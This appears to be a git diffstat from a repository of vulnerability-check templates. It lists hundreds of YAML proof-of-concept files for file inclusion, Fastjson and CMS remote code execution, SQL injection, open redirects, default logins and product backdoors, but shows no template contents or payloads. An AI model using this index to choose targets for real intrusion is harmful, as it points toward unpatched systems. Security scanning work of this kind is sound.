poc/java/springboot-autoconfig.yaml | 25 -
poc/java/springboot-beans-10441.yaml | 2 +-
poc/java/springboot-configprops-10442.yaml | 42 +
poc/java/springboot-env-10449.yaml | 13 +-
poc/java/springboot-env-10450.yaml | 41 +
poc/java/springboot-env-10451.yaml | 34 +-
poc/java/springboot-h2-db-rce-10455.yaml | 2 +-
...e-10457.yaml => springboot-h2-db-rce.yaml} | 0
poc/java/springboot-health-10459.yaml | 38 +
poc/java/springboot-health.yaml | 25 -
poc/java/springboot-heapdump-10463.yaml | 29 -
poc/java/springboot-httptrace-10469.yaml | 25 +-
poc/java/springboot-info-10470.yaml | 9 +-
poc/java/springboot-info.yaml | 31 +
poc/java/springboot-loggers-10475.yaml | 13 +-
poc/java/springboot-loggers-10476.yaml | 30 -
poc/java/springboot-loggers-10477.yaml | 29 +
poc/java/springboot-mappings-10478.yaml | 31 +
poc/java/springboot-mappings-10481.yaml | 31 -
poc/java/springboot-mappings.yaml | 4 +-
poc/java/springboot-metrics-10483.yaml | 14 +-
poc/java/springboot-threaddump-10484.yaml | 26 +-
poc/java/springboot-threaddump-10486.yaml | 34 -
poc/java/springboot-trace.yaml | 31 -
poc/java/struts-debug-mode.yaml | 11 +-
poc/java/struts-problem-report-10563.yaml | 20 -
poc/java/struts-problem-report-10564.yaml | 19 +
poc/java/struts-problem-report.yaml | 3 +-
poc/java/tomcat-default-login-10791.yaml | 2 +-
poc/java/tomcat-default-login.yaml | 76 +
poc/java/tomcat-detect-10793.yaml | 4 +-
poc/java/tomcat-detect.yaml | 21 +-
poc/java/tomcat-pathnormalization.yaml | 28 -
poc/java/tomcat-scripts-10803.yaml | 33 +-
poc/java/weblogic-iiop-detect-11148.yaml | 4 -
poc/java/weblogic-t3-detect-11151.yaml | 23 +-
...152.yaml => weblogic-t3-detect-11153.yaml} | 0
poc/java/weblogic-weak-login-11154.yaml | 68 -
poc/java/weblogic-weak-login-11155.yaml | 14 +-
...webview-addjavascript-interface-11175.yaml | 5 +-
...ebview-addjavascript-interface-11176.yaml} | 0
poc/java/webview-javascript.yaml | 11 +-
...el-11211.yaml => wildfly-panel-11209.yaml} | 0
poc/java/wildfly-panel.yaml | 16 +-
.../aem-querybuilder-json-servlet-182.yaml | 72 +-
poc/javascript/bower-json-769.yaml | 39 -
poc/javascript/bower-json.yaml | 31 +
poc/javascript/fastjson-1-2-24-rce-7400.yaml | 21 +-
poc/javascript/fastjson-1-2-24-rce.yaml | 46 -
poc/javascript/fastjson-1-2-41-rce-7403.yaml | 17 +-
poc/javascript/fastjson-1-2-41-rce.yaml | 31 +
poc/javascript/fastjson-1-2-42-rce-7407.yaml | 17 +-
...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0
poc/javascript/fastjson-1-2-43-rce-7411.yaml | 17 +-
poc/javascript/fastjson-1-2-43-rce-7412.yaml | 44 +
poc/javascript/fastjson-1-2-47-rce-7415.yaml | 19 +-
poc/javascript/fastjson-1-2-47-rce-7416.yaml | 9 +-
poc/javascript/fastjson-1-2-62-rce-7419.yaml | 43 +
poc/javascript/fastjson-1-2-67-rce-7424.yaml | 17 +-
poc/javascript/jsf-detection-8397.yaml | 19 -
poc/javascript/jsf-detection-8398.yaml | 31 +
poc/javascript/jsf-detection.yaml | 31 +-
poc/javascript/jsherp-boot-panel.yaml | 31 -
...json-8472.yaml => keycloak-json-8473.yaml} | 0
poc/javascript/keycloak-json-8474.yaml | 5 +-
poc/javascript/package-json-9421.yaml | 41 +
poc/javascript/package-json.yaml | 26 -
...webview-addjavascript-interface-11175.yaml | 5 +-
...ebview-addjavascript-interface-11176.yaml} | 0
poc/javascript/webview-javascript.yaml | 11 +-
poc/jenkins/jenkins-default-8270.yaml | 10 +-
...default.yaml => jenkins-default-8272.yaml} | 0
poc/jenkins/jenkins-detect-8275.yaml | 27 -
poc/jenkins/jenkins-detect-8276.yaml | 34 +
poc/jenkins/jenkins-login-8277.yaml | 27 -
poc/jenkins/jenkins-login-8280.yaml | 18 +
poc/jenkins/jenkins-script-8284.yaml | 46 -
poc/jenkins/jenkins-script.yaml | 35 +
poc/jenkins/jenkins-stack-trace-8285.yaml | 27 +
poc/jenkins/jenkins-stack-trace-8287.yaml | 3 +-
poc/jenkins/unauthenticated-jenkins.yaml | 50 +-
poc/joomla/joomla-com-fabrik-lfi-8370.yaml | 16 +-
...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0
poc/joomla/joomla-config-file-8376.yaml | 10 +-
poc/joomla/joomla-config-file-8377.yaml | 12 +-
poc/joomla/joomla-file-listing-8380.yaml | 36 +
poc/joomla/joomla-file-listing.yaml | 22 -
poc/joomla/joomla-htaccess-8381.yaml | 9 +-
poc/joomla/joomla-manifest-file-8386.yaml | 17 +-
poc/joomla/joomla-manifest-file-8388.yaml | 14 +-
poc/joomla/joomla-panel-8389.yaml | 16 +
poc/joomla/joomla-panel-8391.yaml | 18 -
poc/joomla/joomla-panel.yaml | 9 +-
poc/joomla/joomla-workflow-8394.yaml | 2 +-
poc/joomla/joomla-workflow.yaml | 13 -
poc/joomla/rusty-joomla-9955.yaml | 24 +-
poc/joomla/rusty-joomla.yaml | 38 +
.../kafka-center-default-login-8415.yaml | 13 +-
poc/kafka/kafka-center-default-login.yaml | 42 +
poc/kafka/kafka-center-login.yaml | 19 +-
poc/kafka/kafka-connect-ui-8423.yaml | 2 +-
poc/kafka/kafka-consumer-monitor-8424.yaml | 18 +
poc/kafka/kafka-consumer-monitor-8425.yaml | 21 -
poc/kafka/kafka-consumer-monitor.yaml | 21 +-
poc/kafka/kafka-cruise-control-8426.yaml | 5 +-
poc/kafka/kafka-cruise-control-8427.yaml | 5 +-
poc/kafka/kafka-monitoring-8428.yaml | 18 +
poc/kafka/kafka-monitoring-8430.yaml | 4 +-
poc/kafka/kafka-monitoring-8431.yaml | 18 -
poc/kong/kong-detect-8499.yaml | 30 +-
poc/kong/kong-detect-8501.yaml | 28 +-
poc/laravel/laravel-debug-enabled-8576.yaml | 27 -
poc/laravel/laravel-debug-enabled.yaml | 23 -
poc/laravel/laravel-env-8582.yaml | 52 +
poc/laravel/laravel-env-8583.yaml | 8 +-
poc/laravel/laravel-filemanager-lfi-8587.yaml | 6 +-
poc/laravel/laravel-filemanager-lfi-8588.yaml | 4 +
poc/laravel/laravel-ignition-xss-8593.yaml | 18 +-
poc/laravel/laravel-ignition-xss.yaml | 30 +
poc/laravel/laravel-log-file-8596.yaml | 31 -
poc/laravel/laravel-log-file-8598.yaml | 16 +-
poc/laravel/laravel-telescope-8600.yaml | 18 +-
poc/laravel/laravel-telescope-8601.yaml | 13 +-
poc/ldap/phpldapadmin-panel.yaml | 41 +
.../Karel-ip-phone-lfi.yaml | 20 +-
.../accent-microcomputers-lfi-14.yaml | 17 +-
.../accent-microcomputers-lfi-16.yaml | 33 +
.../accent-microcomputers-lfi-17.yaml | 34 -
.../ad-widget-lfi-124.yaml | 33 -
.../ad-widget-lfi-126.yaml | 19 +-
.../admin-word-count-column-lfi-81.yaml | 25 +
.../admin-word-count-column-lfi.yaml | 14 +-
...l => advanced-access-manager-lfi-116.yaml} | 0
.../advanced-access-manager-lfi.yaml | 35 -
.../asanhamayesh-lfi-552.yaml | 32 -
.../asanhamayesh-lfi-553.yaml | 21 +
.../asanhamayesh-lfi.yaml | 13 +-
.../bems-api-lfi-709.yaml | 25 -
.../bems-api-lfi-711.yaml | 22 +-
.../bems-api-lfi-712.yaml | 24 -
.../blue-ocean-excellence-lfi-756.yaml | 33 -
.../brandfolder-lfi-778.yaml | 14 +-
poc/local_file_inclusion/brandfolder-lfi.yaml | 35 -
.../bullwark-momentum-lfi-806.yaml | 19 +-
.../bullwark-momentum-lfi-807.yaml | 39 -
.../bullwark-momentum-lfi-808.yaml | 16 +-
poc/local_file_inclusion/cherry-lfi-902.yaml | 11 +-
poc/local_file_inclusion/cherry-lfi-903.yaml | 37 +
.../churchope-lfi-915.yaml | 11 +-
poc/local_file_inclusion/churchope-lfi.yaml | 32 -
.../cs-cart-unauthenticated-lfi-1284.yaml | 26 +
....yaml => cs-cart-unauthenticated-lfi.yaml} | 0
.../db-backup-lfi-6774.yaml | 25 -
.../db-backup-lfi-6775.yaml | 30 +
.../db-backup-lfi-6776.yaml | 11 +-
poc/local_file_inclusion/db-backup-lfi.yaml | 4 -
.../diarise-theme-lfi-6990.yaml | 17 +-
.../diarise-theme-lfi.yaml | 27 -
.../dicoogle-pacs-lfi-6993.yaml | 11 +-
poc/local_file_inclusion/eibiz-lfi-7185.yaml | 8 +-
poc/local_file_inclusion/eibiz-lfi-7187.yaml | 13 +-
.../elfinder-detect-7201.yaml | 12 +-
.../elfinder-detect-7202.yaml | 15 +-
.../elfinder-path-traversal-7203.yaml | 37 -
...rsal.yaml => elfinder-path-traversal.yaml} | 0
.../elfinder-version-7205.yaml | 19 +-
.../elfinder-version.yaml | 38 -
.../generic-linux-lfi.yaml | 10 +-
.../generic-windows-lfi-7591.yaml | 35 +
.../generic-windows-lfi.yaml | 31 +-
.../geovision-geowebserver-lfi-7595.yaml | 20 +-
.../geovision-geowebserver-lfi-7596.yaml | 17 +-
.../global-domains-lfi-7715.yaml | 13 +-
.../global-domains-lfi.yaml | 28 +
poc/local_file_inclusion/goip-1-lfi-7763.yaml | 11 +-
poc/local_file_inclusion/goip-1-lfi-7764.yaml | 23 -
.../groupoffice-lfi-7849.yaml | 19 +
.../groupoffice-lfi-7850.yaml | 6 +-
poc/local_file_inclusion/groupoffice-lfi.yaml | 28 +
poc/local_file_inclusion/gsoap-lfi-7855.yaml | 14 +-
poc/local_file_inclusion/gsoap-lfi.yaml | 19 +
.../hb-audio-lfi-7911.yaml | 19 +-
.../hb-audio-lfi-7912.yaml | 13 +-
.../health-check-lfi-7922.yaml | 15 +-
.../hide-security-enhancer-lfi-7952.yaml | 18 +-
.../hide-security-enhancer-lfi.yaml | 23 -
.../hrsale-unauthenticated-lfi-8039.yaml | 23 +-
.../hrsale-unauthenticated-lfi-8041.yaml | 9 +-
.../huawei-hg255s-lfi-8059.yaml | 24 +-
.../huawei-hg255s-lfi-8060.yaml | 27 -
.../huawei-hg659-lfi-8071.yaml | 5 -
.../huawei-hg659-lfi.yaml | 21 -
.../issuu-panel-lfi-8199.yaml | 6 +-
poc/local_file_inclusion/issuu-panel-lfi.yaml | 29 +
poc/local_file_inclusion/jeewms-lfi-8253.yaml | 9 +-
poc/local_file_inclusion/jeewms-lfi.yaml | 28 -
.../jinfornet-jreport-lfi-8307.yaml | 19 +
.../jinfornet-jreport-lfi-8308.yaml | 23 -
.../jinfornet-jreport-lfi.yaml | 6 +-
.../jolokia-unauthenticated-lfi-8366.yaml | 31 +
....yaml => jolokia-unauthenticated-lfi.yaml} | 0
.../joomla-com-fabrik-lfi-8370.yaml | 16 +-
...i-8371.yaml => joomla-com-fabrik-lfi.yaml} | 0
.../karel-ip-phone-lfi-8436.yaml | 9 +-
.../kyocera-m2035dn-lfi-8557.yaml | 16 +-
.../kyocera-m2035dn-lfi-8559.yaml | 8 +-
.../laravel-filemanager-lfi-8587.yaml | 6 +-
.../laravel-filemanager-lfi-8588.yaml | 4 +
poc/local_file_inclusion/lfi-linux-fuzz.yaml | 78 +
poc/local_file_inclusion/lfi.yaml | 67 +-
poc/local_file_inclusion/linux-lfi-fuzz.yaml | 30 +-
.../magicflow-lfi-8710.yaml | 8 +-
.../magicflow-lfi-8713.yaml | 22 +-
.../minimouse-lfi-8877.yaml | 23 +
poc/local_file_inclusion/minimouse-lfi.yaml | 1 +
.../moodle-filter-jmol-lfi-8938.yaml | 20 -
.../moodle-filter-jmol-lfi-8939.yaml | 4 +-
.../moodle-filter-jmol-lfi-8941.yaml | 20 +-
poc/local_file_inclusion/mpsec-lfi-8957.yaml | 18 +-
poc/local_file_inclusion/mpsec-lfi.yaml | 35 -
.../oliver-library-lfi-9239.yaml | 16 +-
.../oliver-library-lfi-9241.yaml | 13 +-
.../opencti-lfi-9267.yaml | 25 +-
.../opencti-lfi-9268.yaml | 31 -
.../opensis-lfi-9317.yaml | 19 +-
poc/local_file_inclusion/opensis-lfi.yaml | 28 -
.../oracle-fatwire-lfi-9380.yaml | 21 +-
.../orbiteam-bscw-server-lfi-9404.yaml | 33 +
.../orbiteam-bscw-server-lfi.yaml | 12 +-
...-lfi.yaml => pacsone-server-lfi-9428.yaml} | 0
.../pacsone-server-lfi-9429.yaml | 20 +-
.../phpwiki-lfi-9567.yaml | 3 +-
poc/local_file_inclusion/pikpikculfi.yaml | 67 -
.../processmaker-lfi-9660.yaml | 2 +-
.../processmaker-lfi-9662.yaml | 32 +-
.../qihang-media-lfi-9769.yaml | 44 -
.../qihang-media-lfi.yaml | 37 +
.../ruijie-networks-lfi-9938.yaml | 7 +-
.../ruijie-networks-lfi-9942.yaml | 1 -
.../samsung-wlan-ap-lfi-10000.yaml | 29 +
.../samsung-wlan-ap-lfi-9999.yaml | 25 -
.../shortcode-lfi-10214.yaml | 7 +-
.../shortcode-lfi-10216.yaml | 14 +-
.../simple-image-manipulator-lfi-10281.yaml | 7 +-
.../simple-image-manipulator-lfi-10282.yaml | 25 +
.../simple-image-manipulator-lfi.yaml | 17 +-
.../sl-studio-lfi-10321.yaml | 17 +-
poc/local_file_inclusion/sl-studio-lfi.yaml | 22 +
poc/local_file_inclusion/sniplets-lfi.yaml | 22 +-
.../sofneta-mecdream-pacs-lfi-10350.yaml | 13 +-
.../sofneta-mecdream-pacs-lfi.yaml | 30 +
.../targa-camera-lfi-10654.yaml | 10 +-
.../targa-camera-lfi-10655.yaml | 23 +-
.../thinkcmf-lfi-10721.yaml | 21 +
.../thinkcmf-lfi-10723.yaml | 33 -
.../video-synchro-pdf-lfi-11006.yaml | 9 +-
.../video-synchro-pdf-lfi-11007.yaml | 25 +
.../video-synchro-pdf-lfi.yaml | 9 +-
.../vmware-vcenter-lfi-11047.yaml | 41 -
.../vmware-vcenter-lfi-linux-11042.yaml | 2 +-
.../vmware-vcenter-lfi.yaml | 27 +
poc/local_file_inclusion/wordpress-LFI.yaml | 6 +-
poc/local_file_inclusion/wordpress-lfi.yaml | 21 -
.../wordpress-wordfence-lfi-11346.yaml | 21 +
.../wordpress-wordfence-lfi-11348.yaml | 4 +-
.../wordpress-wordfence-lfi-11350.yaml | 21 -
.../wp-javospot-lfi-11482.yaml | 38 +
poc/local_file_inclusion/wp-javospot-lfi.yaml | 26 -
...p-memphis-documents-library-lfi-11495.yaml | 38 +
...p-memphis-documents-library-lfi-11496.yaml | 4 +-
.../wp-simple-fields-lfi-11566.yaml | 19 +-
.../wp-simple-fields-lfi-11569.yaml | 20 -
.../wp-socialfit-xss-11577.yaml | 4 +-
poc/local_file_inclusion/wp-tinymce-lfi.yaml | 10 +-
.../wp-tutor-lfi-11596.yaml | 17 +-
...tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} | 0
.../wp-vault-lfi-11610.yaml | 4 +-
.../xerox-efi-lfi-11683.yaml | 11 +-
poc/local_file_inclusion/xerox-efi-lfi.yaml | 33 +
.../yishaadmin-lfi-11744.yaml | 12 +-
poc/local_file_inclusion/yishaadmin-lfi.yaml | 33 +
poc/magento/magento-2-exposed-api-8687.yaml | 5 +-
poc/magento/magento-2-exposed-api-8688.yaml | 45 +
poc/magento/magento-admin-panel-8690.yaml | 21 +
poc/magento/magento-admin-panel-8692.yaml | 28 -
poc/magento/magento-admin-panel-8695.yaml | 6 +-
poc/magento/magento-cacheleak-8696.yaml | 15 +-
poc/magento/magento-cacheleak-8699.yaml | 40 -
poc/magento/magento-config-disclosure.yaml | 50 -
poc/magento/magento-detect-8706.yaml | 8 +-
poc/microsoft/74cms-sqli-9.yaml | 7 +-
.../{74cms-sqli-10.yaml => 74cms-sqli.yaml} | 0
...aml => aims-password-mgmt-client-219.yaml} | 0
.../aims-password-mgmt-client-221.yaml | 17 +
poc/microsoft/aims-password-portal-225.yaml | 22 +
poc/microsoft/aims-password-portal.yaml | 2 +-
poc/microsoft/api-buttercms-403.yaml | 22 +-
poc/microsoft/bems-api-lfi-709.yaml | 25 -
poc/microsoft/bems-api-lfi-711.yaml | 22 +-
poc/microsoft/bems-api-lfi-712.yaml | 24 -
poc/microsoft/bolt-cms-panel-762.yaml | 38 -
poc/microsoft/bolt-cms-panel-763.yaml | 37 +
poc/microsoft/bolt-cms-panel.yaml | 17 +-
...k-cms-840.yaml => call-break-cms-838.yaml} | 0
poc/microsoft/chamilo-lms-sqli-892.yaml | 37 -
poc/microsoft/chamilo-lms-sqli.yaml | 26 +
poc/microsoft/cisco-systems-login-973.yaml | 25 +
poc/microsoft/cisco-systems-login-975.yaml | 32 -
poc/microsoft/cisco-systems-login.yaml | 12 +-
poc/microsoft/craft-cms-detect-1247.yaml | 3 +-
poc/microsoft/craft-cms-detect.yaml | 28 -
.../dahua-wpms-addimgico-fileupload.yaml | 78 +-
...dedecms-carbuyaction-fileinclude-6794.yaml | 30 +
... => dedecms-carbuyaction-fileinclude.yaml} | 0
...aml => dedecms-membergroup-sqli-6796.yaml} | 0
.../dedecms-membergroup-sqli-6798.yaml | 15 +-
poc/microsoft/dedecms-openredirect-6800.yaml | 14 +-
poc/microsoft/dedecms-openredirect-6802.yaml | 18 +-
.../default-microsoft-azure-page-6873.yaml | 9 +-
.../default-microsoft-azure-page-6874.yaml | 6 +-
...7085.yaml => dotcms-admin-panel-7087.yaml} | 0
poc/microsoft/dotnetcms-sqli-7089.yaml | 22 +-
poc/microsoft/dotnetcms-sqli.yaml | 25 -
.../duomicms-sql-injection-7124.yaml | 27 +
poc/microsoft/duomicms-sql-injection.yaml | 22 +
...recms-xss.yaml => empirecms-xss-7218.yaml} | 0
poc/microsoft/empirecms-xss-7220.yaml | 25 -
poc/microsoft/ems-login-panel-7223.yaml | 18 -
poc/microsoft/feifeicms-lfr-7464.yaml | 6 +-
poc/microsoft/feifeicms-lfr.yaml | 26 -
poc/microsoft/fuelcms-default-login-7571.yaml | 16 +-
poc/microsoft/fuelcms-default-login-7572.yaml | 20 +-
...fuzzing-xss-get-params-html-injection.yaml | 8 +-
poc/microsoft/getsimple-cms-detect-7614.yaml | 8 +-
poc/microsoft/getsimple-cms-detect-7615.yaml | 9 +-
poc/microsoft/grav-cms-detect-7842.yaml | 3 +-
poc/microsoft/grav-cms-detect.yaml | 27 -
poc/microsoft/isams-panel.yaml | 45 +
poc/microsoft/jeewms-lfi-8253.yaml | 9 +-
poc/microsoft/jeewms-lfi.yaml | 28 -
.../kevinlab-bems-backdoor-8453.yaml | 18 +-
.../kevinlab-bems-backdoor-8456.yaml | 18 +-
poc/microsoft/kevinlab-bems-sqli-8457.yaml | 30 -
poc/microsoft/kevinlab-bems-sqli-8459.yaml | 20 +-
.../kevinlab-hems-backdoor-8463.yaml | 7 +
.../kevinlab-hems-backdoor-8465.yaml | 25 +-
.../kevinlab-hems-backdoor-8467.yaml | 41 -
poc/microsoft/kiwitcms-login-8496.yaml | 11 +-
poc/microsoft/lotuscms-rce-8650.yaml | 25 -
poc/microsoft/lotuscms-rce-8651.yaml | 10 +-
poc/microsoft/lotuscms-rce-8652.yaml | 34 +
poc/microsoft/lotuscms-rce-8653.yaml | 22 +-
poc/microsoft/maccmsv10-backdoor-8683.yaml | 15 +-
poc/microsoft/maccmsv10-backdoor-8686.yaml | 23 +-
poc/microsoft/metatag-cms-8832.yaml | 14 +-
poc/microsoft/metatag-cms-8833.yaml | 31 -
...microsoft-exchange-server-detect-8853.yaml | 33 +
...microsoft-exchange-server-detect-8854.yaml | 26 +
.../microsoft-exchange-workflow-8855.yaml | 11 -
.../microsoft-exchange-workflow.yaml | 11 +
poc/microsoft/ms-adcs-detect-8960.yaml | 24 -
poc/microsoft/ms-adcs-detect-8961.yaml | 29 +
poc/microsoft/ms-adcs-detect.yaml | 7 +-
poc/microsoft/msmtp-config-8967.yaml | 42 +
poc/microsoft/myucms-lfr-8985.yaml | 25 -
poc/microsoft/myucms-lfr-8987.yaml | 15 -
poc/microsoft/netlify-cms-9039.yaml | 19 -
poc/microsoft/netlify-cms-9041.yaml | 19 +
.../octobercms-default-login-9192.yaml | 65 -
poc/microsoft/octobercms-default-login.yaml | 59 +
poc/microsoft/octobercms-detect-9195.yaml | 25 -
poc/microsoft/octobercms-detect-9196.yaml | 12 +-
poc/microsoft/odoo-cms-redirect-9199.yaml | 19 +
poc/microsoft/odoo-cms-redirect-9201.yaml | 11 +-
poc/microsoft/pandora-fms-console-9451.yaml | 20 -
poc/microsoft/pandora-fms-console-9453.yaml | 21 +
poc/microsoft/pandora-fms-console.yaml | 22 +-
.../pbootcms-database-file-download-9469.yaml | 29 +
.../pbootcms-database-file-download.yaml | 20 +-
poc/microsoft/plone-cms-detect-9607.yaml | 23 -
...detect.yaml => plone-cms-detect-9608.yaml} | 0
poc/microsoft/powercreator-cms-rce-9645.yaml | 42 +
poc/microsoft/powercreator-cms-rce.yaml | 37 +
poc/microsoft/quick-cms-sqli.yaml | 42 +
poc/microsoft/reflected-params.yaml | 339 +-
poc/microsoft/rhymix-cms-detect-9877.yaml | 13 +-
poc/microsoft/rhymix-cms-detect-9878.yaml | 22 +
poc/microsoft/saferoads-vms-login-9971.yaml | 17 -
poc/microsoft/saferoads-vms-login-9973.yaml | 16 +
poc/microsoft/saferoads-vms-login.yaml | 18 +-
poc/microsoft/samsung-printer-detect.yaml | 22 +-
poc/microsoft/samsung-wlan-ap-lfi-10000.yaml | 29 +
poc/microsoft/samsung-wlan-ap-lfi-9999.yaml | 25 -
poc/microsoft/samsung-wlan-ap-rce-10009.yaml | 23 +-
poc/microsoft/samsung-wlan-ap-rce-10010.yaml | 9 +-
poc/microsoft/samsung-wlan-ap-xss-10012.yaml | 25 +
poc/microsoft/samsung-wlan-ap-xss.yaml | 24 -
.../samsung-wlan-default-login-10018.yaml | 45 +
poc/microsoft/seaCMS-sqli.yaml | 28 +-
poc/microsoft/seacms-rce-10101.yaml | 24 +
poc/microsoft/seacms-sqli-10103.yaml | 39 +
.../seeddms-default-login-10125.yaml | 16 +-
.../seeddms-default-login-10127.yaml | 20 +-
poc/microsoft/seeddms-detect-10129.yaml | 40 +-
poc/microsoft/seeddms-detect-10131.yaml | 21 +
poc/microsoft/sevone-nms-network-manager.yaml | 32 -
poc/microsoft/tikiwiki-cms-10773.yaml | 20 +
poc/microsoft/tikiwiki-cms-10775.yaml | 20 -
poc/microsoft/top-xss-params-10807.yaml | 75 +
poc/microsoft/top-xss-params-10809.yaml | 81 -
poc/microsoft/vpms-auth-bypass-11066.yaml | 33 +
poc/microsoft/vpms-auth-bypass-11068.yaml | 32 -
...r-xss.yaml => wems-manager-xss-11192.yaml} | 0
poc/microsoft/wems-manager-xss-11194.yaml | 21 +-
poc/microsoft/wondercms-detect-11222.yaml | 24 +
poc/microsoft/wondercms-detect.yaml | 21 -
poc/microsoft/wp-arforms-listing-11415.yaml | 31 +
.../wp-mstore-plugin-listing-11500.yaml | 30 +
...62.yaml => wp-sfwd-lms-listing-11564.yaml} | 0
poc/microsoft/wp-sfwd-lms-listing-11565.yaml | 3 +-
poc/microsoft/wp-super-forms-11585.yaml | 19 +-
poc/microsoft/wp-super-forms-11588.yaml | 17 +-
poc/microsoft/wuzhicms-detect-11653.yaml | 11 +-
poc/microsoft/wuzhicms-detect-11654.yaml | 30 +
poc/microsoft/wuzhicms-detect.yaml | 24 +
poc/microsoft/wuzhicms-sqli-11659.yaml | 38 +-
poc/microsoft/xdcms-sqli-11664.yaml | 30 -
poc/microsoft/xdcms-sqli-11666.yaml | 18 +-
poc/microsoft/zcms-v3-sqli-11773.yaml | 23 -
poc/microsoft/zcms-v3-sqli.yaml | 12 +-
poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml | 4 +-
poc/microsoft/zms-auth-bypass-11830.yaml | 33 +
poc/microsoft/zms-auth-bypass-11832.yaml | 34 -
.../alibaba-mongoshake-unauth-268.yaml | 27 +
.../alibaba-mongoshake-unauth-270.yaml | 10 +-
poc/mongodb/mongodb-detect-8920.yaml | 20 +
poc/mongodb/mongodb-detect.yaml | 20 +-
poc/mongodb/mongodb-ops-manager.yaml | 19 +-
poc/mongodb/mongodb-unauth-8925.yaml | 22 -
poc/mongodb/mongodb-unauth-8928.yaml | 15 +-
poc/mongodb/rockmongo-default-login-9897.yaml | 47 +
poc/mongodb/rockmongo-default-login-9899.yaml | 11 +-
poc/mongodb/rockmongo-xss-9902.yaml | 28 -
poc/mongodb/rockmongo-xss-9904.yaml | 23 +-
.../unauthenticated-mongo-express.yaml | 23 +
poc/mysql/exposed-mysql-initial-7323.yaml | 17 +-
poc/mysql/exposed-mysql-initial-7324.yaml | 9 +-
poc/mysql/mysql-native-password-8981.yaml | 5 +-
poc/mysql/mysql-native-password.yaml | 21 +-
poc/netlify/api-netlify-470.yaml | 31 -
poc/netlify/api-netlify.yaml | 25 +
poc/netlify/netlify-cms-9039.yaml | 19 -
poc/netlify/netlify-cms-9041.yaml | 19 +
poc/nginx/default-nginx-page-6880.yaml | 5 +-
poc/nginx/default-nginx-page-6881.yaml | 19 +
...l => git-config-nginxoffbyslash-7628.yaml} | 0
.../git-config-nginxoffbyslash-7630.yaml | 35 +
poc/nginx/nginx-config-9098.yaml | 26 +-
...inx-config.yaml => nginx-config-9099.yaml} | 0
poc/nginx/nginx-linux-page-9102.yaml | 17 -
poc/nginx/nginx-linux-page-9103.yaml | 6 +-
poc/nginx/nginx-linux-page.yaml | 17 -
poc/nginx/nginx-proxy-manager-9111.yaml | 3 +-
poc/nginx/nginx-proxy-manager-9114.yaml | 4 +-
poc/nginx/nginx-version-9122.yaml | 25 -
poc/nginx/nginx-version-9123.yaml | 30 +
poc/nginx/nginx-version.yaml | 5 -
poc/nodejs/gradle-cache-node-detect-7797.yaml | 3 +-
poc/nodejs/kube-api-nodes-8507.yaml | 18 +-
poc/nodejs/kube-api-nodes-8508.yaml | 25 -
poc/nodejs/kube-api-nodes.yaml | 22 -
poc/nodejs/lfr_express.yaml | 38 -
poc/nodejs/node-ecstatic-listing.yaml | 33 +
poc/nodejs/node-integration-enabled-9136.yaml | 17 +
poc/nodejs/node-integration-enabled-9137.yaml | 20 -
.../puppet-node-manager-detect-9720.yaml | 27 -
poc/nodejs/puppet-node-manager-detect.yaml | 20 +
poc/nodejs/unauthenticated-mongo-express.yaml | 23 +
...ized-puppet-node-manager-detect-10958.yaml | 20 +
...ized-puppet-node-manager-detect-10959.yaml | 24 -
...authorized-puppet-node-manager-detect.yaml | 9 +-
poc/open_redirect/Sap-redirect.yaml | 8 +-
.../age-gate-open-redirect-207.yaml | 36 -
poc/open_redirect/age-gate-open-redirect.yaml | 29 +
.../attitude-theme-open-redirect.yaml | 20 -
poc/open_redirect/aws-redirect-651.yaml | 24 +
poc/open_redirect/aws-redirect-652.yaml | 13 +-
poc/open_redirect/bitrix-open-redirect.yaml | 50 +-
.../brandfolder-open-redirect-779.yaml | 23 -
.../brandfolder-open-redirect-782.yaml | 22 +-
.../dedecms-openredirect-6800.yaml | 14 +-
.../dedecms-openredirect-6802.yaml | 18 +-
.../drupal-user-enum-redirect-7115.yaml | 21 +-
.../eatery-restaurant-open-redirect-7158.yaml | 30 +
.../eatery-restaurant-open-redirect.yaml | 20 -
.../elementorpage-open-redirect.yaml | 13 +-
.../homeautomation-v3-openredirect-7985.yaml | 18 -
.../httpbin-open-redirect-8049.yaml | 27 +-
poc/open_redirect/httpbin-open-redirect.yaml | 23 -
.../music-store-open-redirect-8972.yaml | 20 +-
.../music-store-open-redirect.yaml | 21 +
...newsletter-manager-open-redirect-9075.yaml | 4 +-
.../newsletter-manager-open-redirect.yaml | 4 +-
.../newsletter-open-redirect-9076.yaml | 16 +-
.../newsletter-open-redirect.yaml | 22 -
poc/open_redirect/odoo-cms-redirect-9199.yaml | 19 +
poc/open_redirect/odoo-cms-redirect-9201.yaml | 11 +-
.../office365-open-redirect-9212.yaml | 25 +-
.../office365-open-redirect-9215.yaml | 24 -
poc/open_redirect/open-redirect-9310.yaml | 139 +-
.../otobo-open-redirect-9409.yaml | 30 -
.../otobo-open-redirect-9411.yaml | 11 +-
.../pieregister-open-redirect-9577.yaml | 13 +-
.../pieregister-open-redirect-9579.yaml | 4 +-
.../pieregister-plugin-open-redirect.yaml | 19 -
poc/open_redirect/pollbot-redirect-9621.yaml | 4 +-
poc/open_redirect/pollbot-redirect-9622.yaml | 27 +
poc/open_redirect/sap-redirect.yaml | 22 -
.../ultimatemember-open-redirect-10877.yaml | 30 -
.../ultimatemember-open-redirect-10879.yaml | 6 +-
poc/open_redirect/url-redirect.yaml | 142 +-
...ekender-newspaper-open-redirect-11186.yaml | 26 +-
.../weekender-newspaper-open-redirect.yaml | 18 -
...ress-redirection-plugin-listing-11306.yaml | 22 -
...ess-redirection-plugin-listing-11308.yaml} | 0
.../wp-grimag-open-redirect-11458.yaml | 17 +
.../wp-grimag-open-redirect-11461.yaml | 9 +-
.../wp-grimag-open-redirect-11462.yaml | 26 +-
...=> wp-gtranslate-open-redirect-11463.yaml} | 0
.../wp-gtranslate-open-redirect-11465.yaml | 22 -
.../wp-prostore-open-redirect-11546.yaml | 17 -
.../wp-prostore-open-redirect-11549.yaml | 14 +-
.../wp-prostore-open-redirect-11550.yaml | 20 +
.../wptouch-open-redirect-11592.yaml | 24 +
.../wptouch-open-redirect-11595.yaml | 23 +-
.../wptouch-plugin-open-redirect.yaml | 13 +-
poc/oracle/metadata-oracle-8829.yaml | 36 +
poc/oracle/metadata-oracle.yaml | 40 -
poc/oracle/oracle-business-control-9346.yaml | 4 +-
poc/oracle/oracle-business-control-9347.yaml | 20 -
poc/oracle/oracle-dbass-detect-9350.yaml | 1 -
